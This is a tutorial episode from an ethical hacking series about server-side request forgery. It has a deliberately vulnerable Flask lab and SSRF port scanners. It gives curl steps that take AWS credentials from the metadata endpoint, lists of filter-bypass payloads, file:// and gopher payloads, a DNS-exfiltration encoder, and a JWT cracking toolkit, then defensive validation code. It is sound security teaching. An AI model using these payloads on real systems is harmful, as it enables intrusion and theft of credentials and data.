Learn Ethical Hacking (#18) - Server-Side Request Forgery - Making Servers Betray Themselves
What will I learn
- What SSRF is and why it's one of the most dangerous modern web vulnerabilities;
- Basic SSRF: making the server request internal resources on your behalf;
- Blind SSRF: detecting SSRF when there's no visible response;
- Cloud metadata attacks: accessing AWS/GCP/Azure instance metadata via SSRF;
- Filter bypass techniques: URL parsing tricks, DNS rebinding, protocol smuggling;
- The Capital One breach (2019): how one SSRF led to 100 million stolen records.
Requirements
- A working modern computer running macOS, Windows or Ubuntu;
- Your hacking lab from Episode 2;
- Python 3 with requests and Flask (pip install flask);
- The ambition to learn ethical hacking and security research.
Difficulty
- Intermediate
Curriculum (of the Learn Ethical Hacking series):
- Learn Ethical Hacking (#1) - Why Hackers Win
- Learn Ethical Hacking (#2) - Your Hacking Lab
- Learn Ethical Hacking (#3) - How the Internet Actually Works - For Attackers
- Learn Ethical Hacking (#4) - Reconnaissance - The Art of Not Being Noticed
- Learn Ethical Hacking (#5) - Active Scanning - Mapping the Attack Surface
- Learn Ethical Hacking (#6) - The AI Slop Epidemic - Why AI-Generated Code Is a Security Disaster
- Learn Ethical Hacking (#7) - Passwords - Why Humans Are the Weakest Cipher
- Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human
- Learn Ethical Hacking (#9) - Cryptography for Hackers - What Protects Data (and What Doesn't)
- Learn Ethical Hacking (#10) - The Vulnerability Lifecycle - From Discovery to Patch to Exploit
- Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection
- Learn Ethical Hacking (#12) - SQL Injection - The Bug That Won't Die
- Learn Ethical Hacking (#13) - SQL Injection Advanced - Extracting Entire Databases
- Learn Ethical Hacking (#14) - Cross-Site Scripting (XSS) - Injecting Code Into Browsers
- Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP
- Learn Ethical Hacking (#16) - Cross-Site Request Forgery - Making Users Attack Themselves
- Learn Ethical Hacking (#17) - Authentication Bypass - Getting In Without a Password
- Learn Ethical Hacking (#18) - Server-Side Request Forgery - Making Servers Betray Themselves (this post)
Solutions to Episode 17 Exercises
Exercise 1 -- Hydra brute force:
# DVWA (Low): hydra finds admin:password in <1 second (first in wordlist)
# SSH Metasploitable2: msfadmin:msfadmin found in ~30 seconds
# DVWA Medium: adds CSRF token to login form.
# Hydra's basic http-get-form doesn't handle dynamic CSRF tokens.
# Need to: capture token with curl first, or use Burp Intruder
# which can extract tokens from responses between requests.
The key insight: CSRF tokens on login forms don't just prevent CSRF -- they also make automated brute force significantly harder. Each request needs a fresh token, breaking simple replay-based tools.
Exercise 2 -- JWT attack toolkit:
import jwt, json, base64, sys

def decode_jwt(token):
    parts = token.split('.')
    header = json.loads(base64.urlsafe_b64decode(parts[0] + '=='))
    payload = json.loads(base64.urlsafe_b64decode(parts[1] + '=='))
    return header, payload

def none_attack(payload_data):
    return jwt.encode(payload_data, key="", algorithm="none")

def crack_secret(token, wordlist_path):
    for line in open(wordlist_path, errors='replace'):
        secret = line.strip()
        try:
            jwt.decode(token, secret, algorithms=["HS256"])
            return secret
        except jwt.InvalidSignatureError:
            continue
    return None
# Test: token = jwt.encode({"user":"guest"}, "secret123", algorithm="HS256")
# crack_secret(token, "rockyou.txt") -> "secret123" found in ~2 seconds
The key insight: JWTs are NOT encrypted -- the payload is visible to anyone. The signature only proves the token wasn't tampered with. If the secret is weak, the attacker can sign their own tokens.
Exercise 3 -- Three auth mechanisms compared:
Session-based: Most secure for server-rendered apps. Session data
stays server-side. Token is random, meaningless to attacker.
Weakness: if token generation is predictable, session hijacking.
JWT-based: Stateless, scalable. But token contains data readable by
client. Weakness: none-algorithm, weak secrets, can't invalidate
tokens server-side (until expiry).
Basic auth: Credentials sent with EVERY request (base64 encoded,
NOT encrypted). Over HTTP, trivially captured by any network
observer. Only safe over HTTPS. Weakest of the three.
Winner: session-based with cryptographically random tokens, HttpOnly
cookie, and session regeneration on login.
Learn Ethical Hacking (#18) - Server-Side Request Forgery
Every vulnerability we've covered so far exploits the relationship between the user and the application. SQL injection (episodes 12-13) abuses how the application talks to its database. XSS (episodes 14-15) abuses how the application talks to the browser. CSRF (episode 16) abuses how the browser talks to the application. Authentication bypass (episode 17) abuses how the application decides who you are. All of these share one thing: the attacker is on the outside, poking at the front door.
SSRF flips the model entirely. Instead of attacking the application from the outside, you make the application attack its OWN infrastructure from the inside. The server becomes your proxy. You feed it a URL, it fetches that URL for you, and suddenly you have access to internal services, metadata endpoints, databases, admin panels -- things that are completely invisible from the public internet but wide open from the server's perspective.
SSRF entered the OWASP Top 10 in 2021 as a brand new entry. Not because the vulnerability class was new (it wasn't), but because the explosion of cloud infrastructure made it devastating. When every server has access to a metadata endpoint that hands out AWS credentials to anyone who asks from inside the instance... well. You can probably see where this is going ;-)
Here we go.
The Fundamental Problem
Many web applications need to fetch external resources based on user input. URL preview features, image proxies, webhook deliveries, PDF generators, "import from URL" buttons, RSS feed readers -- all of these take a URL from the user and make an HTTP request to it on the server side:
# Vulnerable: fetches whatever URL the user provides
from flask import Flask, request
import requests

app = Flask(__name__)

@app.route('/fetch')
def fetch_url():
    url = request.args.get('url')
    resp = requests.get(url)  # SSRF: server fetches attacker-controlled URL
    return resp.text
Normal use: /fetch?url=https://example.com -- returns example.com's content. Perfectly reasonable feature.
Attacker's use: /fetch?url=http://localhost:8080/admin -- the SERVER requests its OWN admin panel (which is only accessible from localhost) and returns the content to the attacker.
See the problem? The application trusts itself. Internal services trust the server's IP address. Network firewalls protect the perimeter but don't restrict internal traffic. When you make the server send the request, all those protections evaporate. The request originates from inside the trusted network, from a trusted IP, and every internal service treats it as legitimate.
This is fundamentally different from everything we've covered before. With SQL injection, you exploit the application's trust in user input to the database. With SSRF, you exploit the network's trust in the application itself. The application isn't the target -- it's the weapon.
Building a Vulnerable Lab
Let's build an SSRF lab. Save this on your Kali VM as ssrf_lab.py:
#!/usr/bin/env python3
"""SSRF vulnerable application -- LAB ONLY."""
from flask import Flask, request
import requests

app = Flask(__name__)

# "Internal" service -- only accessible from localhost
@app.route('/internal/secrets')
def internal_secrets():
    if request.remote_addr != '127.0.0.1':
        return "Access denied", 403
    return "SECRET_API_KEY=sk-12345-very-secret\nDB_PASSWORD=hunter2\nADMIN_TOKEN=eyJhbG...\n"

# "Internal" admin panel
@app.route('/internal/admin')
def internal_admin():
    if request.remote_addr != '127.0.0.1':
        return "Access denied", 403
    return "Admin Panel\nUsers: 14,293\nRevenue: $892,100\nDB host: 10.0.0.5:5432\n"

# "Public" feature -- URL preview with SSRF vulnerability
@app.route('/preview')
def preview():
    url = request.args.get('url', '')
    if not url:
        return 'Preview'
    try:
        resp = requests.get(url, timeout=5)
        return f"Preview of {url}\n{resp.text[:2000]}"
    except Exception as e:
        return f"Error: {e}"

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)
Start it and test:
python3 ssrf_lab.py &
# Normal use -- preview an external site
curl "http://localhost:5000/preview?url=http://example.com"
# SSRF -- access "internal only" secrets through the preview feature
curl "http://localhost:5000/preview?url=http://127.0.0.1:5000/internal/secrets"
# Returns: SECRET_API_KEY=sk-12345-very-secret
# SSRF -- access "internal only" admin panel
curl "http://localhost:5000/preview?url=http://127.0.0.1:5000/internal/admin"
# Returns: Admin Panel, Users: 14,293, Revenue: $892,100, DB host: 10.0.0.5:5432
The /internal/secrets endpoint checks that requests come from localhost. The preview feature runs ON localhost. So the SSRF request passes the IP check and the server happily returns the secrets. From the internal service's perspective, this is a perfectly legitimate local request. It has no way to know it was triggered by an external attacker.
Port Scanning via SSRF
Once you have SSRF, the server becomes your port scanner for the internal network. Instead of scanning from the outside (which firewalls would block), you scan from inside:
#!/usr/bin/env python3
"""SSRF-based internal port scanner. LAB ONLY."""
import requests
import time

target_url = "http://localhost:5000/preview"
internal_host = "127.0.0.1"
ports = [21, 22, 80, 443, 3306, 5000, 5432, 6379, 8080, 8443, 9200, 27017]

print(f"[*] Scanning {internal_host} via SSRF...")
for port in ports:
    scan_url = f"http://{internal_host}:{port}/"
    start = time.time()
    try:
        # params= URL-encodes the inner URL before it goes into ?url=
        resp = requests.get(target_url, params={"url": scan_url}, timeout=5)
        elapsed = time.time() - start
        if "Error" not in resp.text:
            print(f"  [+] Port {port}: OPEN ({elapsed:.2f}s) -- got response")
        elif "Connection refused" in resp.text:
            # The lab echoes the exception text; a refusal means nothing is listening
            print(f"  [-] Port {port}: closed ({elapsed:.2f}s)")
        elif elapsed < 1:
            # Fast error that is not a refusal: often a non-HTTP service answered
            print(f"  [?] Port {port}: possibly open ({elapsed:.2f}s) -- fast error")
        else:
            print(f"  [-] Port {port}: closed ({elapsed:.2f}s)")
    except requests.Timeout:
        print(f"  [-] Port {port}: filtered (timeout)")
    except Exception as e:
        print(f"  [-] Port {port}: error ({e})")
python3 ssrf_scanner.py
# [*] Scanning 127.0.0.1 via SSRF...
# [+] Port 5000: OPEN (0.01s) -- got response
# [-] Port 22: closed (0.02s)
# [-] Port 3306: closed (0.03s)
In a real environment, you'd scan internal IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) looking for databases, caches, admin panels, monitoring systems -- anything that's firewalled from the outside but accessible from the application server. Finding a Redis instance (port 6379) or Elasticsearch (port 9200) without authentication on the internal network is extremely common. And once you can talk to those services through SSRF, you can read data, write data, and sometimes execute commands.
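To make the jump from a single host to a range concrete, here is a minimal sketch that only generates the request URLs for a scan like the one above. The function name `ssrf_targets` is an assumption for illustration, and nothing is sent over the network:

```python
import ipaddress
from urllib.parse import urlencode

def ssrf_targets(preview_endpoint, cidr, ports):
    """Yield one SSRF request URL per (host, port) pair in a CIDR range."""
    for host in ipaddress.ip_network(cidr).hosts():
        for port in ports:
            inner = f"http://{host}:{port}/"
            # urlencode() escapes the inner URL so it survives as one parameter
            yield f"{preview_endpoint}?{urlencode({'url': inner})}"

# A /30 has two usable hosts; two ports each gives four requests
targets = list(ssrf_targets("http://localhost:5000/preview",
                            "10.0.0.0/30", [6379, 9200]))
for t in targets:
    print(t)
```

Feeding these URLs into the scanner loop is all it takes to sweep a subnet, which is also why a sudden burst of preview requests for sequential internal addresses is a useful detection signal for defenders.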
Cloud Metadata: The SSRF Gold Mine
This is where SSRF goes from "interesting vulnerability" to "company-ending catastrophe."
Every major cloud provider exposes an instance metadata service at a well-known internal IP address. This service provides credentials, configuration, and secrets to the running instance. It's intended for the instance itself to discover its own configuration at boot time -- what IAM role it has, what region it's in, what user-data was passed to it:
# AWS Instance Metadata Service (IMDSv1)
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data/
# GCP Metadata Service
http://metadata.google.internal/computeMetadata/v1/
# (requires header: Metadata-Flavor: Google)
# Azure Metadata Service
http://169.254.169.254/metadata/instance?api-version=2021-02-01
# (requires header: Metadata: true)
169.254.169.254 is a link-local address -- it's not routable on the public internet, only accessible from within the cloud instance. But if you have SSRF on an application running in AWS, that link-local address is absolutely reachable:
# Step 1: Enumerate metadata categories
curl "http://vulnerable.com/preview?url=http://169.254.169.254/latest/meta-data/"
# Returns: ami-id, hostname, instance-type, local-ipv4, iam/...
# Step 2: Get the IAM role name
curl "http://vulnerable.com/preview?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# Returns: my-ec2-role
# Step 3: Get temporary AWS credentials for that role
curl "http://vulnerable.com/preview?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/my-ec2-role"
# Returns JSON with: AccessKeyId, SecretAccessKey, Token
# YOU NOW HAVE AWS API ACCESS WITH THAT ROLE'S PERMISSIONS
With those credentials, the attacker can do anything the IAM role allows -- list S3 buckets, read databases, launch EC2 instances, access secrets in AWS Secrets Manager, assume other roles. The credentials are temporary (they expire) but they can be refreshed via the same metadata endpoint as long as the SSRF vulnerability exists.
Having said that, GCP and Azure metadata services require specific headers (Metadata-Flavor: Google and Metadata: true respectively). Many SSRF vulnerabilities use HTTP client libraries that don't let the attacker control headers, which makes those services harder to exploit via basic SSRF. AWS IMDSv1 requires no special headers at all -- a bare GET request is enough. That's why AWS SSRF is the poster child for this attack class.
The Capital One Breach (2019)
This is not theoretical. This is EXACTLY how one of the largest data breaches in history happened.
Capital One ran their infrastructure on AWS. Their web application firewall (a ModSecurity-based WAF) had an SSRF vulnerability in its configuration. Paige Thompson (former AWS employee, handle "erratic") discovered the flaw in March 2019. The attack chain:
- Found SSRF in the WAF configuration endpoint
- Used SSRF to request http://169.254.169.254/latest/meta-data/iam/security-credentials/
- Retrieved the WAF's IAM role name: ISRM-WAF-Web-Role
- Retrieved temporary AWS credentials for that role
- Used those credentials to list S3 buckets -- found over 700 buckets
- Downloaded data from buckets containing credit card applications
- Exfiltrated 100 million credit applications, 140,000 Social Security numbers, and 80,000 bank account numbers
One SSRF. One metadata endpoint. Zero authentication required. The total cost to Capital One: over $300 million in fines, settlements, and remediation. Thompson was convicted under the CFAA and sentenced to probation with time served (she had spent time in custody pre-trial).
The devastating part is how preventable it was. The IAM role attached to the WAF had far more permissions than it needed. It could list and read S3 buckets across the entire account. Under the principle of least privilege, a WAF needs to read its own configuration and write logs -- it has absolutely no business accessing customer data buckets. But overly permissive IAM policies are the norm, not the exception. "Just give it full S3 access, we'll lock it down later" -- and later never comes until the breach ;-)
That is why SSRF is in the OWASP Top 10 now.
Filter Bypass Techniques
Once developers realize SSRF is a problem, they try to filter URLs. "Just block requests to localhost and 169.254.169.254." Sounds reasonable. In practice, the number of ways to represent those addresses makes simple string-matching filters almost useless:
# Block "localhost" and "127.0.0.1"? Try these alternatives:
"http://127.0.0.1" # standard IPv4
"http://0.0.0.0" # all-interfaces address
"http://[::1]" # IPv6 localhost
"http://127.1" # shortened IPv4 (some parsers accept this)
"http://127.0.1" # another shortened form
"http://2130706433" # decimal representation of 127.0.0.1
"http://0x7f000001" # hexadecimal representation
"http://0177.0.0.1" # octal representation
"http://localtest.me" # public domain that resolves to 127.0.0.1
"http://spoofed.burpcollaborator.net" # attacker-controlled DNS
# Block "169.254.169.254"? Try:
"http://[0:0:0:0:0:ffff:169.254.169.254]" # IPv6 mapped IPv4
"http://169.254.169.254.nip.io" # DNS wildcard service
"http://2852039166" # decimal representation
"http://0xa9fea9fe" # hexadecimal
"http://0251.0376.0251.0376" # octal
URL parsing inconsistencies are another rich bypass vector. Different URL parsers disagree on how to interpret ambiguous URLs, and security filters often use a different parser than the HTTP client that actually makes the request:
# The security filter sees host="evil.com", the HTTP client sees host="127.0.0.1"
"http://evil.com@127.0.0.1" # userinfo before host
"http://127.0.0.1#@evil.com" # fragment tricks
"http://127.0.0.1%00@evil.com" # null byte in URL
"http://127.0.0.1:80@evil.com" # port in unexpected position
The @ character in URLs separates the "userinfo" (username:password) from the hostname. http://evil.com@127.0.0.1 means "connect to 127.0.0.1 with userinfo evil.com". Some URL parsers extract the hostname as evil.com (reading before the @), others as 127.0.0.1 (reading after the @). If the filter uses the first parser and the HTTP client uses the second, the filter sees a legitimate external domain while the request actually goes to localhost.
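The disagreement is easy to reproduce. The sketch below compares a deliberately flawed hand-rolled host extractor (the hypothetical `naive_filter_host`, standing in for a sloppy filter) with Python's standard `urlparse`:

```python
from urllib.parse import urlparse

def naive_filter_host(url: str) -> str:
    """Flawed on purpose: takes everything after '://' up to the first
    '/', '@' or ':' as the host. Hypothetical, for illustration only."""
    rest = url.split("://", 1)[1]
    for sep in ("/", "@", ":"):
        rest = rest.split(sep, 1)[0]
    return rest

url = "http://evil.com@127.0.0.1/admin"
filter_view = naive_filter_host(url)
client_view = urlparse(url).hostname

print("naive filter sees:", filter_view)
print("urlparse sees:    ", client_view)
```

The practical lesson: validate the host with the same parser (ideally the same library call) that the HTTP client will use, and consider rejecting any URL that contains userinfo at all.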
DNS rebinding is the most sophisticated bypass. The attacker controls a DNS server that responds with different IPs for the same domain:
- Application receives URL: http://attacker-dns.com/path
- Filter resolves attacker-dns.com -- DNS server returns 93.184.216.34 (legitimate external IP). Filter says: "not internal, allow"
- Application makes the actual HTTP request, resolves DNS again -- this time the attacker's DNS server returns 127.0.0.1
- Request goes to localhost
The filter checked the DNS at validation time. The HTTP client resolved DNS again at request time. Between those two moments, the attacker changed the DNS response. This is called a TOCTOU (time-of-check-time-of-use) vulnerability -- the check and the use happen at different times, and the attacker changes the state in between.
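The race can be simulated without any real DNS. In this sketch `RebindingResolver` is a made-up stand-in for the attacker's DNS server; the two functions contrast the vulnerable check-then-use pattern with resolving once and reusing the validated address:

```python
import ipaddress
from itertools import chain, repeat

class RebindingResolver:
    """Fake DNS server: first answer is public, every later answer is loopback."""
    def __init__(self):
        self._answers = chain(["93.184.216.34"], repeat("127.0.0.1"))

    def resolve(self, hostname: str) -> str:
        return next(self._answers)

def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return addr.is_loopback or addr.is_private or addr.is_link_local

def check_then_fetch(resolver, host):
    """Vulnerable: validates one lookup, connects using a second lookup."""
    if is_internal(resolver.resolve(host)):           # time of check
        return "blocked"
    return f"connected to {resolver.resolve(host)}"   # time of use

def resolve_once(resolver, host):
    """Safer: one lookup, and the validated IP is the one connected to."""
    ip = resolver.resolve(host)
    if is_internal(ip):
        return "blocked"
    return f"connected to {ip}"

vulnerable = check_then_fetch(RebindingResolver(), "attacker-dns.com")
pinned = resolve_once(RebindingResolver(), "attacker-dns.com")
print("check-then-fetch:", vulnerable)
print("resolve once:    ", pinned)
```

The only difference between the two functions is how many times the name is resolved, which is the whole attack.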
Defenses against DNS rebinding include pinning the resolved IP (resolve once, use that IP for the request), blocking DNS responses containing private IPs, and using DNS-over-HTTPS to prevent cache poisoning. But these are complex to implement correctly, and most applications don't bother.
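Coming back to the numeric encodings from the start of this section: they are all the same 32-bit number written in different bases. A minimal standard-library sketch (the helper name `ip_variants` is an assumption) shows how they are derived. Whether a given HTTP client actually accepts each form depends on its URL parser and resolver, so treat the output as candidates to test rather than guaranteed bypasses:

```python
import ipaddress

def ip_variants(dotted: str) -> dict:
    """Return alternative spellings of one IPv4 address (hypothetical helper)."""
    as_int = int(ipaddress.IPv4Address(dotted))
    return {
        "decimal": str(as_int),
        "hex": hex(as_int),
        # A leading 0 marks an octet as octal for inet_aton-style parsers
        "octal_dotted": ".".join(f"0{int(o):o}" for o in dotted.split(".")),
        "ipv6_mapped": f"[::ffff:{dotted}]",
    }

variants = ip_variants("169.254.169.254")
for name, value in variants.items():
    print(f"{name:13} http://{value}")

# Parsing the integer form yields the same address object, which is why
# filters should compare parsed addresses and never raw strings.
same = ipaddress.IPv4Address(int(variants["decimal"])) == ipaddress.IPv4Address("169.254.169.254")
print("normalizes to the same address:", same)
```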
Blind SSRF
Sometimes the server fetches the URL but doesn't show you the response. The preview page says "URL fetched successfully" regardless of what came back. Or maybe it only shows an image (for an image proxy feature) and your metadata endpoint returns JSON, so you see a broken image icon. The SSRF still exists -- you just can't see the response directly.
Blind SSRF is still dangerous. You can:
- Out-of-band interaction: Point the URL to a server you control (Burp Collaborator, a VPS, or a simple HTTP listener) and check your access logs. If you get a hit from the target server's IP, SSRF is confirmed.
- Timing-based detection: Internal hosts that exist respond faster than non-existent ones. If http://10.0.0.1:3306/ takes 0.05 seconds and http://10.0.0.1:9999/ takes 5 seconds (timeout), port 3306 is probably open.
- Error-based detection: Different error messages for reachable vs unreachable hosts. "Connection refused" (host exists, port closed) vs "No route to host" (host doesn't exist).
#!/usr/bin/env python3
"""Blind SSRF port scanner via timing. LAB ONLY."""
import requests
import time

target = "http://localhost:5000/preview"
internal_range = "127.0.0.1"

print("[*] Blind SSRF port scan via timing differences...")
for port in [22, 80, 443, 3306, 5000, 5432, 6379, 8080, 8443, 9200]:
    start = time.time()
    try:
        resp = requests.get(
            f"{target}?url=http://{internal_range}:{port}/",
            timeout=5
        )
    except requests.RequestException:
        pass  # a timeout or dropped connection still gives us a timing sample
    elapsed = time.time() - start
    # Caveat: a closed port on a reachable host is refused instantly, so on
    # localhost every port looks fast. Timing separates filtered ports and
    # dead hosts (slow) from reachable ones (fast).
    if elapsed < 1:
        print(f"  [+] Port {port}: likely OPEN (responded in {elapsed:.2f}s)")
    elif elapsed < 3:
        print(f"  [?] Port {port}: uncertain ({elapsed:.2f}s)")
    else:
        print(f"  [-] Port {port}: closed/filtered ({elapsed:.2f}s)")
Even without seeing the response content, blind SSRF lets you map the internal network (which hosts exist, which ports are open), confirm cloud metadata access (does a request to 169.254.169.254 come back quickly instead of timing out?), and potentially exfiltrate data through DNS (encoding stolen data in subdomain queries: stolen-data.attacker.com).
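The DNS exfiltration idea comes down to an encoding problem: arbitrary bytes have to fit into hostname labels of at most 63 characters each. Here is a rough sketch of that encoding step only. The function names, the chunk size, and the placeholder domain `attacker.example` are assumptions, and no DNS query is made:

```python
import base64

MAX_LABEL = 63  # DNS limit: each dot-separated label is at most 63 bytes

def to_dns_names(data: bytes, domain: str, chunk: int = 30) -> list:
    """Encode data as base32 labels under `domain`, one query name per chunk."""
    names = []
    for seq, start in enumerate(range(0, len(data), chunk)):
        piece = data[start:start + chunk]
        label = base64.b32encode(piece).decode().rstrip("=").lower()
        assert len(label) <= MAX_LABEL
        names.append(f"{seq}.{label}.{domain}")   # seq keeps chunks ordered
    return names

def from_dns_names(names: list) -> bytes:
    """Reverse step, as a parser of the receiving DNS server's logs might do it."""
    out = b""
    for name in sorted(names, key=lambda n: int(n.split(".")[0])):
        label = name.split(".")[1].upper()
        label += "=" * (-len(label) % 8)          # restore base32 padding
        out += base64.b32decode(label)
    return out

secret = b"DB_PASSWORD=hunter2"
names = to_dns_names(secret, "attacker.example")
print(names)
print(from_dns_names(names))
```

Base32 is used here because hostnames are case-insensitive, which rules out base64. For defenders, this is the reason long, high-entropy subdomains in outbound DNS logs deserve attention.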
Protocol Smuggling
SSRF doesn't have to be limited to HTTP. Depending on the HTTP client library, you might be able to use other URL schemes:
# File protocol -- read local files
/preview?url=file:///etc/passwd
/preview?url=file:///proc/self/environ
/preview?url=file:///home/webapp/.aws/credentials
# Gopher protocol -- send arbitrary TCP data (extremely powerful)
/preview?url=gopher://127.0.0.1:6379/_SET%20pwned%20true
# Dict protocol -- interact with dictionary services
/preview?url=dict://127.0.0.1:6379/INFO
The file:// protocol is straightforward -- it reads local files from the server's filesystem. If the SSRF supports it, you can read configuration files, credentials, SSH keys, environment variables (which often contain API keys and database passwords), and application source code.
The gopher:// protocol is the nuclear option. Gopher lets you send raw TCP data to any port. This means you can construct valid Redis commands, MySQL queries, SMTP emails, or any other TCP protocol and deliver them through the SSRF. A gopher-based SSRF to Redis can write arbitrary files to disk (via CONFIG SET dir and SAVE), which means RCE if you can write to a web-accessible directory or a crontab file.
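As an illustration of what "raw TCP data" means in practice, this sketch builds the gopher URL for a couple of harmless Redis inline commands. The helper name `gopher_url` is hypothetical, and whether the target's HTTP client honours gopher:// at all is an assumption you would have to test in your lab:

```python
from urllib.parse import quote

def gopher_url(host: str, port: int, commands: list) -> str:
    """Build a gopher:// URL carrying CRLF-terminated text commands."""
    raw = "".join(cmd + "\r\n" for cmd in commands)
    # The first character after '/' is the gopher item type and is not sent;
    # '_' is a conventional filler. Everything after it goes out on the wire.
    return f"gopher://{host}:{port}/_{quote(raw, safe='')}"

url = gopher_url("127.0.0.1", 6379, ["SET pwned true", "QUIT"])
print(url)
```

When this URL is itself passed in a ?url= query parameter it has to be URL-encoded a second time, because the web framework decodes the parameter once before the HTTP client ever sees it.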
Not all HTTP libraries support these protocols. Python's requests library only supports http:// and https://. But urllib supports file://, and some older or more permissive libraries support gopher://. Always test which protocols the target's HTTP client accepts -- it dramatically changes what you can do with the SSRF.
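The urllib behaviour is easy to verify locally. This sketch writes a throwaway file (a stand-in for something like /etc/passwd; the content is made up) and reads it back through `urllib.request.urlopen` using a file:// URL:

```python
import os
import tempfile
import urllib.request
from pathlib import Path

# Stand-in for a sensitive local file (hypothetical content)
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
    fh.write("SECRET_API_KEY=sk-12345-very-secret\n")
    secret_path = Path(fh.name)

file_url = secret_path.as_uri()   # absolute path turned into file:///...
with urllib.request.urlopen(file_url) as resp:
    leaked = resp.read().decode()

os.unlink(secret_path)
print(file_url)
print(leaked)
```

An application that passes user input to `urlopen()` therefore needs an explicit scheme allowlist, since the library will not refuse file:// on its own.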
The AI Slop Angle
SSRF-vulnerable code is consistently generated by AI code assistants (continuing our thread from episodes 6, 12, 14, 16, and 17):
- URL fetch features with zero input validation -- requests.get(user_input) with no checks on the URL's scheme, host, or destination
- Image proxy endpoints that accept any URL and fetch it server-side, intended for displaying images but exploitable for any HTTP request
- Webhook delivery systems where the user specifies the callback URL and the server POSTs to it without verifying the destination is external
- PDF/screenshot services that render user-supplied URLs using headless browsers, which often have access to internal network resources
- "Import from URL" features in content management systems and data tools
The pattern is the same one we've seen across every vulnerability class: the AI generates code that WORKS (the URL preview feature works, the image proxy works, the webhook system works) but doesn't consider what happens when the input is adversarial. Nobody asks "what if the user passes http://169.254.169.254/ instead of http://example.com/image.png?" during development. The feature works correctly for every legitimate use case. It only breaks when someone uses it the way it was NOT intended to be used -- which is exactly what attackers do ;-)
The Defense
Defending against SSRF properly requires multiple layers. Here's a comprehensive validation function:
from urllib.parse import urlparse
import ipaddress
import socket

BLOCKED_NETWORKS = [
    ipaddress.ip_network('127.0.0.0/8'),      # loopback
    ipaddress.ip_network('10.0.0.0/8'),       # private class A
    ipaddress.ip_network('172.16.0.0/12'),    # private class B
    ipaddress.ip_network('192.168.0.0/16'),   # private class C
    ipaddress.ip_network('169.254.0.0/16'),   # link-local (metadata!)
    ipaddress.ip_network('0.0.0.0/8'),        # "this network"
    ipaddress.ip_network('100.64.0.0/10'),    # carrier-grade NAT
    ipaddress.ip_network('198.18.0.0/15'),    # benchmarking
    ipaddress.ip_network('::1/128'),          # IPv6 loopback
    ipaddress.ip_network('fc00::/7'),         # IPv6 private
    ipaddress.ip_network('fe80::/10'),        # IPv6 link-local
]
ALLOWED_SCHEMES = ('http', 'https')

def is_safe_url(url):
    """Validate URL to prevent SSRF. Returns (safe, reason)."""
    parsed = urlparse(url)
    # Scheme check
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False, f"Blocked scheme: {parsed.scheme}"
    # Must have a hostname
    if not parsed.hostname:
        return False, "No hostname in URL"
    # Resolve hostname to IP (prevents DNS rebinding partially)
    try:
        resolved_ip = socket.gethostbyname(parsed.hostname)
        ip = ipaddress.ip_address(resolved_ip)
    except (socket.gaierror, ValueError) as e:
        return False, f"DNS resolution failed: {e}"
    # Check against blocked ranges
    for network in BLOCKED_NETWORKS:
        if ip in network:
            return False, f"IP {ip} is in blocked range {network}"
    return True, "OK"

# Usage:
safe, reason = is_safe_url("http://169.254.169.254/latest/meta-data/")
print(f"Safe: {safe}, Reason: {reason}")
# Safe: False, Reason: IP 169.254.169.254 is in blocked range 169.254.0.0/16
This blocks the most common attacks. But it's NOT complete. DNS rebinding can still bypass this because the DNS resolution happens at validation time but the HTTP client may re-resolve the hostname when making the actual request. To fix that:
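import requests
from urllib.parse import urljoin

def fetch_url_safely(url, max_redirects=3):
    """Fetch a URL with SSRF protection -- resolve once, pin IP."""
    safe, reason = is_safe_url(url)
    if not safe:
        return None, reason
    parsed = urlparse(url)
    # is_safe_url() did its own lookup; a rebinding DNS server may answer
    # differently now, so re-check the exact IP we are about to connect to
    try:
        resolved_ip = socket.gethostbyname(parsed.hostname)
    except socket.gaierror as e:
        return None, f"DNS resolution failed: {e}"
    if any(ipaddress.ip_address(resolved_ip) in net for net in BLOCKED_NETWORKS):
        return None, f"IP {resolved_ip} is in a blocked range"
    # Pin the resolved IP -- make the request to the IP directly
    # with the original Host header (so virtual hosts still work).
    # Note: this breaks TLS hostname checks, so https:// needs extra work.
    port = f":{parsed.port}" if parsed.port else ""
    pinned_url = parsed._replace(netloc=f"{resolved_ip}{port}").geturl()
    headers = {'Host': f"{parsed.hostname}{port}"}
    resp = requests.get(pinned_url, headers=headers, timeout=5,
                        allow_redirects=False)  # don't follow redirects!
    # If the server redirects, validate the redirect target too
    if resp.is_redirect:
        if max_redirects <= 0:
            return None, "Too many redirects"
        # Location may be relative, so resolve it against the original URL
        redirect_url = urljoin(url, resp.headers.get('Location', ''))
        return fetch_url_safely(redirect_url, max_redirects - 1)  # recursive validation
    return resp.text, "OK"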
Note the allow_redirects=False. If you follow redirects automatically, the server can redirect your request to http://169.254.169.254/ AFTER passing the initial validation. Always validate redirect targets separately.
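One more gap is worth sketching. `socket.gethostbyname()` only ever returns IPv4 addresses, so the IPv6 entries in the blocklist only matter once the lookup is extended to IPv6 (for example with `socket.getaddrinfo()`). At that point IPv4-mapped addresses such as ::ffff:169.254.169.254 need to be unwrapped before checking, because an IPv6 address object never matches an IPv4 network. A minimal sketch, with `is_internal_address` as a hypothetical helper that leans on the address properties the `ipaddress` module already provides:

```python
import ipaddress

def is_internal_address(raw: str) -> bool:
    """True if the address should never be fetched on behalf of a user."""
    ip = ipaddress.ip_address(raw)
    # Unwrap ::ffff:a.b.c.d so the IPv4 rules apply to the embedded address
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)

for candidate in ["169.254.169.254", "::ffff:169.254.169.254", "::1",
                  "10.0.0.5", "93.184.216.34"]:
    print(f"{candidate:26} internal={is_internal_address(candidate)}")

# The mapped form slips past a plain IPv4 network membership test:
mapped = ipaddress.ip_address("::ffff:169.254.169.254")
missed = mapped in ipaddress.ip_network("169.254.0.0/16")
print("plain blocklist match for mapped form:", missed)
```

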